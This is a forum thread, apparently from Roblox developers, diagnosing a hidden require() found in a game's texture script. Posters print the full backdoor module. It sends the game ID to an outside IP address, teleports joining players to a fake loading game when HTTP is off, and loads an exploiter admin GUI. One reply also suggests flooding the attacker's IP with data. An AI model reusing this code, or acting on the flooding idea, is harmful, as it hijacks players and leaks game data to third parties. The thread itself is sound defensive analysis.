On this game I’m working on there’s a script in the textures that says “require(6353063872)” I know that this is probably grabbing a script module and I just wanted to know if anyone else has had this problem and I would like to know where it came from.
The person who uploaded the model probably did it intentionally or, unknowingly, had a plugin with a virus.
Use CTRL + Shift + F while selecting the text to search for more scripts as well or type script in Explorer and check what you find.
you could easily play test and copy the module
then after that, end the test and see what the module does after pasting it
After looking through the module you’ve posted along with that script, I found it has linked to a highly disliked game, with over 1M visits, this is most likely a virus script that takes players from your game and takes them to another.
You’re clearly not the first person to have this happen and I would highly suggest turning off HTTPS service and removing the script since looking over more there was jsone code.
Below is the module script found within the require.
local module = {}
local Players = game:GetService('Players')
local TeleportService = game:GetService('TeleportService')
local HttpService = game:GetService('HttpService')
require(6363995283)
local http = game:GetService("HttpService")
function checkHTTP()
local TRUE,FALSE = pcall(function()
http:GetAsync("http://google.com")
end)
if TRUE then return true
elseif FALSE then return false end
end
local HTTPENABLED = checkHTTP()
if HTTPENABLED == true then
-- HTTP IS ENABLED
Players.PlayerAdded:Connect(function(player)
wait(2)
local Data = {
["body"] = string.format('{"gameID":"%s"}',game.GameId)
}
Data = HttpService:JSONEncode(Data)
local req = HttpService:PostAsync("http://51.161.68.190:42069", Data)
print(req.Body)
end)
elseif HTTPENABLED == false then
local Players = game:GetService('Players')
local TeleportService = game:GetService('TeleportService')
local HttpService = game:GetService('HttpService')
local marketplaceService = game:GetService("MarketplaceService")
local placeID = game.PlaceId
local gameName
local isSuccessful, info = pcall(marketplaceService.GetProductInfo, marketplaceService, placeID)
if isSuccessful then
gameName = info.Name
end
Players.PlayerAdded:Connect(function(player)
if player:GetJoinData(player).SourcePlaceId ~= 6291096025 then
-- HTTP IS NOT ENABLED
local teleportDat = {
["gameID"] = game.GameId,
["placeID"] = game.PlaceId
}
TeleportService:Teleport(6291096025,player,teleportDat)
end
end)
end
return module
1 Like
Quick update on the last post, looking more into it you’ve defiantly got a backdoor in your game.
Found this GUI within the code and its just all coded for some form of buyer of the backdoor.
yea this module is bad, probably from a free model?
1 Like
I know that I don’t use free models but I’ll chat with the other developers it was probably from someones bad plugin.
1 Like
YOU HAVE A BACKDOOR!
There is a script that sends the game id to someone. you can flood this ip with data because its a bad person that is running a backdoor ss.
This is a backdoor inside your game, here’s what I found.
https://www.roblox.com/library/6353063872/-
(module that requires another module, teleports people to a game if http isnt enabled and if it is then it sends the game id to a discord webhook)
https://www.roblox.com/games/6291096025/Loading
(fake loading game)
https://www.roblox.com/library/6363995283/-
(a gui that exploiters use to have access to server)
https://www.roblox.com/library/7024325108/-
(a module that returns who has access to the gui)
1 Like
